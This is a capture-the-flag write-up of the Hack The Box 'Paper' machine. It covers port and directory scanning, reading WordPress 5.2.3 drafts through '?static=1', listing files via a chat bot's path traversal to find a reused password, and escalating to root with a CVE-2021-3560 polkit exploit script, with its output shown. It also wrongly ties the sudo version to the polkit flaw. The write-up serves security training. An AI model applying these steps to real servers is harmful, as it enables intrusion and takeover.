HTB Writeup - Paper
Enumeration
Let’s start off with an nmap scan as usual to get a listing of open ports and running services:
sudo nmap -sS -sV -sC -oN scan_full.log -p- -T5 -Pn -n -v $target
Which returns the results:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
| 256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_ 256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods:
| Supported Methods: GET POST OPTIONS HEAD TRACE
|_ Potentially risky methods: TRACE
|_http-title: HTTP Server Test Page powered by CentOS
443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-title: HTTP Server Test Page powered by CentOS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Issuer: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-07-03T08:52:34
| Not valid after: 2022-07-08T10:32:34
| MD5: 579a:92bd:803c:ac47:d49c:5add:e44e:4f84
|_SHA-1: 61a2:301f:9e5c:2603:a643:00b5:e5da:5fd5:c175:f3a9
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods:
| Supported Methods: GET POST OPTIONS HEAD TRACE
|_ Potentially risky methods: TRACE
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
It looks like there is a typical Linux web server set up running; port 22 for remote administration via SSH, ports 80 and 443 for service web applications. Going to port 80 reveals a HTTP test page for CentOS, which is a type of Linux OS often associated with web servers. It can be considered equivalent to RedHat Linux, without the enterprise support.
Going to port 443 reveals the same site. We need to start doing some directory busting to work out what’s running on the server:
feroxbuster -u http://$target/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
One important thing to notice while exploring the box is a custom response header being returned:
X-Backend-Server: office.paper
This is probably a subtle hint for a vhost needed to be adhered to, to be routed to the correct web application. Let’s add it to our /etc/hosts file and then look back at the web application.
Going to the site reveals a blog site which is a satirical reference to the US version of the TV show, The Office.
Something useful we find while browsing the site is a comment on a post saying:
Michael, you should remove the secret content from your drafts ASAP, as they are not that secure as you think!
-Nick
It appears prisonmike is likely the owner of the site since he references having set it up, and it seems he’s not very good at security because there is something secret in his drafts folder.
Given that it is a WordPress site, we can run wpscan against it:
wpscan --url http://office.paper/
Running this returns some useful information including the version of the WordPress instance running which is 5.2.3
Exploiting WordPress 5.2.3
This version of WordPress has a well known exploit that allows an attacker to read content they should not be able to, including the secret mentioned earlier. The exploit is documented here, https://www.exploit-db.com/exploits/47690
We can test this by going to http://office.paper/?static=1 and we can see that in the list of returned posts, there is the one mentioned in michael’s drafts. The information regards a chat application which exposes both the subdomain and the registration URL.
Going to this application reveals a rocket.chat application and a self-registration portal. We can sign up our own user and see what we can see.
Exploiting recyclops
One of the things we can see is that the dwight user has set up a chat bot of some kind called recyclops. It can do things for the user related to the file system such as getting and listing files. Start a direct conversation with the chat bot and ask it to list files for example and it will respond:
Fetching the directory listing of files
- ls: cannot access '/home/dwight/sales/files': No such file or directory
It looks like it uses ls under the hood when you ask it to list anything. It might be possible to get command injection. Just list on it’s own will return:
drwxr-xr-x 4 dwight dwight 32 Jul 3 2021 .
drwx------ 11 dwight dwight 281 Feb 6 2022 ..
drwxr-xr-x 2 dwight dwight 27 Sep 15 2021 sale
drwxr-xr-x 2 dwight dwight 27 Jul 3 2021 sale_2
We can also do list .. which will reveal the contents of dwight’s directory! With this ability, we can see anything dwight can. This includes a sensitive .env file in the /home/dwight/hubot directory that contains a password. This password has been reused by dwight and can be used to log in via SSH.
Privilege Escalation from dwight
One of the first things to do on a Linux box is to check the versions of running software, including default expected services such as sudo. The sudo version on this machine is 1.8.29 which has a known exploit called polkit. An example PoC for this can be found here, https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation/tree/main
The script is well documented so usage is very simple. We can transfer this into the target and run it like so:
./polkit.sh -u=pentester -p='Pentester123!'
I needed to run it several times before it worked because it abuses a race condition. A successful attack looks like:
[!] Username set as : pentester
[!] No Custom Timing specified.
[!] Timing will be detected Automatically
[!] Force flag not set.
[!] Vulnerability checking is ENABLED!
[!] Starting Vulnerability Checks...
[!] Checking distribution...
[!] Detected Linux distribution as "centos"
[!] Checking if Accountsservice and Gnome-Control-Center is installed
[+] Accounts service and Gnome-Control-Center Installation Found!!
[!] Checking if polkit version is vulnerable
[+] Polkit version appears to be vulnerable!!
[!] Starting exploit...
[!] Inserting Username pentester...
Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required
[+] Inserted Username pentester with UID 1005!
[!] Inserting password hash...
[!] It looks like the password insertion was succesful!
[!] Try to login as the injected user using su - pentester
[!] When prompted for password, enter your password
[!] If the username is inserted, but the login fails; try running the exploit again.
[!] If the login was succesful,simply enter 'sudo bash' and drop into a root shell!
We can then login using su pentester, passing in the password and then running sudo bash and we get a full root shell!